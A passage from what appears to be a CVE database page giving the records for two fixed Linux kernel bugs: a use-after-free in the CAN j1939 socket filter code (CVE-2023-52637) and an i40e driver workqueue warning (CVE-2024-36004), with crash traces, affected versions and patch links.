sock_write_iter+0x162/0x220
? __pfx_sock_write_iter+0x10/0x10
? __rtnl_unlock+0x47/0x80
? security_file_permission+0x54/0x320
vfs_write+0x6ba/0x750
? __pfx_vfs_write+0x10/0x10
? __fget_light+0x1ca/0x1f0
? __rcu_read_unlock+0x5b/0x280
ksys_write+0x143/0x170
? __pfx_ksys_write+0x10/0x10
? __kasan_check_read+0x15/0x20
? fpregs_assert_state_consistent+0x62/0x70
__x64_sys_write+0x47/0x60
do_syscall_64+0x60/0x90
? do_syscall_64+0x6d/0x90
? irqentry_exit+0x3f/0x50
? exc_page_fault+0x79/0xf0
entry_SYSCALL_64_after_hwframe+0x6e/0xd8
Allocated by task 348:
kasan_save_stack+0x2a/0x50
kasan_set_track+0x29/0x40
kasan_save_alloc_info+0x1f/0x30
__kasan_kmalloc+0xb5/0xc0
__kmalloc_node_track_caller+0x67/0x160
j1939_sk_setsockopt+0x284/0x450 [can_j1939]
__sys_setsockopt+0x15c/0x2f0
__x64_sys_setsockopt+0x6b/0x80
do_syscall_64+0x60/0x90
entry_SYSCALL_64_after_hwframe+0x6e/0xd8
Freed by task 349:
kasan_save_stack+0x2a/0x50
kasan_set_track+0x29/0x40
kasan_save_free_info+0x2f/0x50
__kasan_slab_free+0x12e/0x1c0
__kmem_cache_free+0x1b9/0x380
kfree+0x7a/0x120
j1939_sk_setsockopt+0x3b2/0x450 [can_j1939]
__sys_setsockopt+0x15c/0x2f0
__x64_sys_setsockopt+0x6b/0x80
do_syscall_64+0x60/0x90
entry_SYSCALL_64_after_hwframe+0x6e/0xd8
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52637",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T17:45:26.968713Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:22:58.193Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.361Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/08de58abedf6e69396e1207e4f99ef8904b2b532"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/978e50ef8c38dc71bd14d1b0143d554ff5d188ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41ccb5bcbf03f02d820bc6ea8390811859f558f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4dd684d4bb3cd5454e0bf6e2a1bdfbd5c9c872ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f84e7534457dcd7835be743517c35378bb4e7c50"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fc74b9cb789cae061bbca7b203a3842e059f6b5d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/efe7cf828039aedb297c1f9920b638fffee6aabc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/can/j1939/j1939-priv.h",
"net/can/j1939/socket.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "08de58abedf6e69396e1207e4f99ef8904b2b532",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "978e50ef8c38dc71bd14d1b0143d554ff5d188ba",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "41ccb5bcbf03f02d820bc6ea8390811859f558f8",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "4dd684d4bb3cd5454e0bf6e2a1bdfbd5c9c872ed",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "f84e7534457dcd7835be743517c35378bb4e7c50",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "fc74b9cb789cae061bbca7b203a3842e059f6b5d",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "efe7cf828039aedb297c1f9920b638fffee6aabc",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/can/j1939/j1939-priv.h",
"net/can/j1939/socket.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: j1939: Fix UAF in j1939_sk_match_filter during setsockopt(SO_J1939_FILTER)\n\nLock jsk-\u003esk to prevent UAF when setsockopt(..., SO_J1939_FILTER, ...)\nmodifies jsk-\u003efilters while receiving packets.\n\nFollowing trace was seen on affected system:\n ==================================================================\n BUG: KASAN: slab-use-after-free in j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]\n Read of size 4 at addr ffff888012144014 by task j1939/350\n\n CPU: 0 PID: 350 Comm: j1939 Tainted: G W OE 6.5.0-rc5 #1\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014\n Call Trace:\n print_report+0xd3/0x620\n ? kasan_complete_mode_report_info+0x7d/0x200\n ? j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]\n kasan_report+0xc2/0x100\n ? j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]\n __asan_load4+0x84/0xb0\n j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]\n j1939_sk_recv+0x20b/0x320 [can_j1939]\n ? __kasan_check_write+0x18/0x20\n ? __pfx_j1939_sk_recv+0x10/0x10 [can_j1939]\n ? j1939_simple_recv+0x69/0x280 [can_j1939]\n ? j1939_ac_recv+0x5e/0x310 [can_j1939]\n j1939_can_recv+0x43f/0x580 [can_j1939]\n ? __pfx_j1939_can_recv+0x10/0x10 [can_j1939]\n ? raw_rcv+0x42/0x3c0 [can_raw]\n ? __pfx_j1939_can_recv+0x10/0x10 [can_j1939]\n can_rcv_filter+0x11f/0x350 [can]\n can_receive+0x12f/0x190 [can]\n ? __pfx_can_rcv+0x10/0x10 [can]\n can_rcv+0xdd/0x130 [can]\n ? __pfx_can_rcv+0x10/0x10 [can]\n __netif_receive_skb_one_core+0x13d/0x150\n ? __pfx___netif_receive_skb_one_core+0x10/0x10\n ? __kasan_check_write+0x18/0x20\n ? _raw_spin_lock_irq+0x8c/0xe0\n __netif_receive_skb+0x23/0xb0\n process_backlog+0x107/0x260\n __napi_poll+0x69/0x310\n net_rx_action+0x2a1/0x580\n ? __pfx_net_rx_action+0x10/0x10\n ? __pfx__raw_spin_lock+0x10/0x10\n ? handle_irq_event+0x7d/0xa0\n __do_softirq+0xf3/0x3f8\n do_softirq+0x53/0x80\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0x6e/0x70\n netif_rx+0x16b/0x180\n can_send+0x32b/0x520 [can]\n ? __pfx_can_send+0x10/0x10 [can]\n ? __check_object_size+0x299/0x410\n raw_sendmsg+0x572/0x6d0 [can_raw]\n ? __pfx_raw_sendmsg+0x10/0x10 [can_raw]\n ? apparmor_socket_sendmsg+0x2f/0x40\n ? __pfx_raw_sendmsg+0x10/0x10 [can_raw]\n sock_sendmsg+0xef/0x100\n sock_write_iter+0x162/0x220\n ? __pfx_sock_write_iter+0x10/0x10\n ? __rtnl_unlock+0x47/0x80\n ? security_file_permission+0x54/0x320\n vfs_write+0x6ba/0x750\n ? __pfx_vfs_write+0x10/0x10\n ? __fget_light+0x1ca/0x1f0\n ? __rcu_read_unlock+0x5b/0x280\n ksys_write+0x143/0x170\n ? __pfx_ksys_write+0x10/0x10\n ? __kasan_check_read+0x15/0x20\n ? fpregs_assert_state_consistent+0x62/0x70\n __x64_sys_write+0x47/0x60\n do_syscall_64+0x60/0x90\n ? do_syscall_64+0x6d/0x90\n ? irqentry_exit+0x3f/0x50\n ? exc_page_fault+0x79/0xf0\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\n Allocated by task 348:\n kasan_save_stack+0x2a/0x50\n kasan_set_track+0x29/0x40\n kasan_save_alloc_info+0x1f/0x30\n __kasan_kmalloc+0xb5/0xc0\n __kmalloc_node_track_caller+0x67/0x160\n j1939_sk_setsockopt+0x284/0x450 [can_j1939]\n __sys_setsockopt+0x15c/0x2f0\n __x64_sys_setsockopt+0x6b/0x80\n do_syscall_64+0x60/0x90\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\n Freed by task 349:\n kasan_save_stack+0x2a/0x50\n kasan_set_track+0x29/0x40\n kasan_save_free_info+0x2f/0x50\n __kasan_slab_free+0x12e/0x1c0\n __kmem_cache_free+0x1b9/0x380\n kfree+0x7a/0x120\n j1939_sk_setsockopt+0x3b2/0x450 [can_j1939]\n __sys_setsockopt+0x15c/0x2f0\n __x64_sys_setsockopt+0x6b/0x80\n do_syscall_64+0x60/0x90\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:29.900Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/08de58abedf6e69396e1207e4f99ef8904b2b532"
},
{
"url": "https://git.kernel.org/stable/c/978e50ef8c38dc71bd14d1b0143d554ff5d188ba"
},
{
"url": "https://git.kernel.org/stable/c/41ccb5bcbf03f02d820bc6ea8390811859f558f8"
},
{
"url": "https://git.kernel.org/stable/c/4dd684d4bb3cd5454e0bf6e2a1bdfbd5c9c872ed"
},
{
"url": "https://git.kernel.org/stable/c/f84e7534457dcd7835be743517c35378bb4e7c50"
},
{
"url": "https://git.kernel.org/stable/c/fc74b9cb789cae061bbca7b203a3842e059f6b5d"
},
{
"url": "https://git.kernel.org/stable/c/efe7cf828039aedb297c1f9920b638fffee6aabc"
}
],
"title": "can: j1939: Fix UAF in j1939_sk_match_filter during setsockopt(SO_J1939_FILTER)",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52637",
"datePublished": "2024-04-03T14:54:40.262Z",
"dateReserved": "2024-03-06T09:52:12.093Z",
"dateUpdated": "2025-05-04T07:40:29.900Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36004 (GCVE-0-2024-36004)
Vulnerability from cvelistv5
Published
2024-05-20 09:48
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
i40e: Do not use WQ_MEM_RECLAIM flag for workqueue
Issue reported by customer during SRIOV testing, call trace:
When both i40e and the i40iw driver are loaded, a warning
in check_flush_dependency is being triggered. This seems
to be because of the i40e driver workqueue is allocated with
the WQ_MEM_RECLAIM flag, and the i40iw one is not.
Similar error was encountered on ice too and it was fixed by
removing the flag. Do the same for i40e too.
[Feb 9 09:08] ------------[ cut here ]------------
[ +0.000004] workqueue: WQ_MEM_RECLAIM i40e:i40e_service_task [i40e] is
flushing !WQ_MEM_RECLAIM infiniband:0x0
[ +0.000060] WARNING: CPU: 0 PID: 937 at kernel/workqueue.c:2966
check_flush_dependency+0x10b/0x120
[ +0.000007] Modules linked in: snd_seq_dummy snd_hrtimer snd_seq
snd_timer snd_seq_device snd soundcore nls_utf8 cifs cifs_arc4
nls_ucs2_utils rdma_cm iw_cm ib_cm cifs_md4 dns_resolver netfs qrtr
rfkill sunrpc vfat fat intel_rapl_msr intel_rapl_common irdma
intel_uncore_frequency intel_uncore_frequency_common ice ipmi_ssif
isst_if_common skx_edac nfit libnvdimm x86_pkg_temp_thermal
intel_powerclamp gnss coretemp ib_uverbs rapl intel_cstate ib_core
iTCO_wdt iTCO_vendor_support acpi_ipmi mei_me ipmi_si intel_uncore
ioatdma i2c_i801 joydev pcspkr mei ipmi_devintf lpc_ich
intel_pch_thermal i2c_smbus ipmi_msghandler acpi_power_meter acpi_pad
xfs libcrc32c ast sd_mod drm_shmem_helper t10_pi drm_kms_helper sg ixgbe
drm i40e ahci crct10dif_pclmul libahci crc32_pclmul igb crc32c_intel
libata ghash_clmulni_intel i2c_algo_bit mdio dca wmi dm_mirror
dm_region_hash dm_log dm_mod fuse
[ +0.000050] CPU: 0 PID: 937 Comm: kworker/0:3 Kdump: loaded Not
tainted 6.8.0-rc2-Feb-net_dev-Qiueue-00279-gbd43c5687e05 #1
[ +0.000003] Hardware name: Intel Corporation S2600BPB/S2600BPB, BIOS
SE5C620.86B.02.01.0013.121520200651 12/15/2020
[ +0.000001] Workqueue: i40e i40e_service_task [i40e]
[ +0.000024] RIP: 0010:check_flush_dependency+0x10b/0x120
[ +0.000003] Code: ff 49 8b 54 24 18 48 8d 8b b0 00 00 00 49 89 e8 48
81 c6 b0 00 00 00 48 c7 c7 b0 97 fa 9f c6 05 8a cc 1f 02 01 e8 35 b3 fd
ff <0f> 0b e9 10 ff ff ff 80 3d 78 cc 1f 02 00 75 94 e9 46 ff ff ff 90
[ +0.000002] RSP: 0018:ffffbd294976bcf8 EFLAGS: 00010282
[ +0.000002] RAX: 0000000000000000 RBX: ffff94d4c483c000 RCX:
0000000000000027
[ +0.000001] RDX: ffff94d47f620bc8 RSI: 0000000000000001 RDI:
ffff94d47f620bc0
[ +0.000001] RBP: 0000000000000000 R08: 0000000000000000 R09:
00000000ffff7fff
[ +0.000001] R10: ffffbd294976bb98 R11: ffffffffa0be65e8 R12:
ffff94c5451ea180
[ +0.000001] R13: ffff94c5ab5e8000 R14: ffff94c5c20b6e05 R15:
ffff94c5f1330ab0
[ +0.000001] FS: 0000000000000000(0000) GS:ffff94d47f600000(0000)
knlGS:0000000000000000
[ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000001] CR2: 00007f9e6f1fca70 CR3: 0000000038e20004 CR4:
00000000007706f0
[ +0.000000] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ +0.000001] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:
0000000000000400
[ +0.000001] PKRU: 55555554
[ +0.000001] Call Trace:
[ +0.000001] <TASK>
[ +0.000002] ? __warn+0x80/0x130
[ +0.000003] ? check_flush_dependency+0x10b/0x120
[ +0.000002] ? report_bug+0x195/0x1a0
[ +0.000005] ? handle_bug+0x3c/0x70
[ +0.000003] ? exc_invalid_op+0x14/0x70
[ +0.000002] ? asm_exc_invalid_op+0x16/0x20
[ +0.000006] ? check_flush_dependency+0x10b/0x120
[ +0.000002] ? check_flush_dependency+0x10b/0x120
[ +0.000002] __flush_workqueue+0x126/0x3f0
[ +0.000015] ib_cache_cleanup_one+0x1c/0xe0 [ib_core]
[ +0.000056] __ib_unregister_device+0x6a/0xb0 [ib_core]
[ +0.000023] ib_unregister_device_and_put+0x34/0x50 [ib_core]
[ +0.000020] i40iw_close+0x4b/0x90 [irdma]
[ +0.000022] i40e_notify_client_of_netdev_close+0x54/0xc0 [i40e]
[ +0.000035] i40e_service_task+0x126/0x190 [i40e]
[ +0.000024] process_one_work+0x174/0x340
[ +0.000003] worker_th
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a Version: 4d5957cbdecdbb77d24c1465caadd801c07afa4a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36004",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:00:59.391854Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:48.116Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.511Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09b54d29f05129b092f7c793a70b689ffb3c7b2c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/546d0fe9d76e8229a67369f9cb61e961d99038bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fbbb2404340dd6178e281bd427c271f7d5ec1d22"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff7431f898dd00892a545b7d0ce7adf5b926944f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/152ed360cf2d273f88fc99a518b7eb868aae2939"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d6105f637883c8c09825e962308c06e977de4f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1594dac8b1ed78f9e75c263327e198a2e5e25b0e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2cc7d150550cc981aceedf008f5459193282425c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/i40e/i40e_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "09b54d29f05129b092f7c793a70b689ffb3c7b2c",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
},
{
"lessThan": "546d0fe9d76e8229a67369f9cb61e961d99038bd",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
},
{
"lessThan": "fbbb2404340dd6178e281bd427c271f7d5ec1d22",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
},
{
"lessThan": "ff7431f898dd00892a545b7d0ce7adf5b926944f",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
},
{
"lessThan": "152ed360cf2d273f88fc99a518b7eb868aae2939",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
},
{
"lessThan": "8d6105f637883c8c09825e962308c06e977de4f0",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
},
{
"lessThan": "1594dac8b1ed78f9e75c263327e198a2e5e25b0e",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
},
{
"lessThan": "2cc7d150550cc981aceedf008f5459193282425c",
"status": "affected",
"version": "4d5957cbdecdbb77d24c1465caadd801c07afa4a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/i40e/i40e_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni40e: Do not use WQ_MEM_RECLAIM flag for workqueue\n\nIssue reported by customer during SRIOV testing, call trace:\nWhen both i40e and the i40iw driver are loaded, a warning\nin check_flush_dependency is being triggered. This seems\nto be because of the i40e driver workqueue is allocated with\nthe WQ_MEM_RECLAIM flag, and the i40iw one is not.\n\nSimilar error was encountered on ice too and it was fixed by\nremoving the flag. Do the same for i40e too.\n\n[Feb 9 09:08] ------------[ cut here ]------------\n[ +0.000004] workqueue: WQ_MEM_RECLAIM i40e:i40e_service_task [i40e] is\nflushing !WQ_MEM_RECLAIM infiniband:0x0\n[ +0.000060] WARNING: CPU: 0 PID: 937 at kernel/workqueue.c:2966\ncheck_flush_dependency+0x10b/0x120\n[ +0.000007] Modules linked in: snd_seq_dummy snd_hrtimer snd_seq\nsnd_timer snd_seq_device snd soundcore nls_utf8 cifs cifs_arc4\nnls_ucs2_utils rdma_cm iw_cm ib_cm cifs_md4 dns_resolver netfs qrtr\nrfkill sunrpc vfat fat intel_rapl_msr intel_rapl_common irdma\nintel_uncore_frequency intel_uncore_frequency_common ice ipmi_ssif\nisst_if_common skx_edac nfit libnvdimm x86_pkg_temp_thermal\nintel_powerclamp gnss coretemp ib_uverbs rapl intel_cstate ib_core\niTCO_wdt iTCO_vendor_support acpi_ipmi mei_me ipmi_si intel_uncore\nioatdma i2c_i801 joydev pcspkr mei ipmi_devintf lpc_ich\nintel_pch_thermal i2c_smbus ipmi_msghandler acpi_power_meter acpi_pad\nxfs libcrc32c ast sd_mod drm_shmem_helper t10_pi drm_kms_helper sg ixgbe\ndrm i40e ahci crct10dif_pclmul libahci crc32_pclmul igb crc32c_intel\nlibata ghash_clmulni_intel i2c_algo_bit mdio dca wmi dm_mirror\ndm_region_hash dm_log dm_mod fuse\n[ +0.000050] CPU: 0 PID: 937 Comm: kworker/0:3 Kdump: loaded Not\ntainted 6.8.0-rc2-Feb-net_dev-Qiueue-00279-gbd43c5687e05 #1\n[ +0.000003] Hardware name: Intel Corporation S2600BPB/S2600BPB, BIOS\nSE5C620.86B.02.01.0013.121520200651 12/15/2020\n[ +0.000001] Workqueue: i40e i40e_service_task [i40e]\n[ +0.000024] RIP: 0010:check_flush_dependency+0x10b/0x120\n[ +0.000003] Code: ff 49 8b 54 24 18 48 8d 8b b0 00 00 00 49 89 e8 48\n81 c6 b0 00 00 00 48 c7 c7 b0 97 fa 9f c6 05 8a cc 1f 02 01 e8 35 b3 fd\nff \u003c0f\u003e 0b e9 10 ff ff ff 80 3d 78 cc 1f 02 00 75 94 e9 46 ff ff ff 90\n[ +0.000002] RSP: 0018:ffffbd294976bcf8 EFLAGS: 00010282\n[ +0.000002] RAX: 0000000000000000 RBX: ffff94d4c483c000 RCX:\n0000000000000027\n[ +0.000001] RDX: ffff94d47f620bc8 RSI: 0000000000000001 RDI:\nffff94d47f620bc0\n[ +0.000001] RBP: 0000000000000000 R08: 0000000000000000 R09:\n00000000ffff7fff\n[ +0.000001] R10: ffffbd294976bb98 R11: ffffffffa0be65e8 R12:\nffff94c5451ea180\n[ +0.000001] R13: ffff94c5ab5e8000 R14: ffff94c5c20b6e05 R15:\nffff94c5f1330ab0\n[ +0.000001] FS: 0000000000000000(0000) GS:ffff94d47f600000(0000)\nknlGS:0000000000000000\n[ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ +0.000001] CR2: 00007f9e6f1fca70 CR3: 0000000038e20004 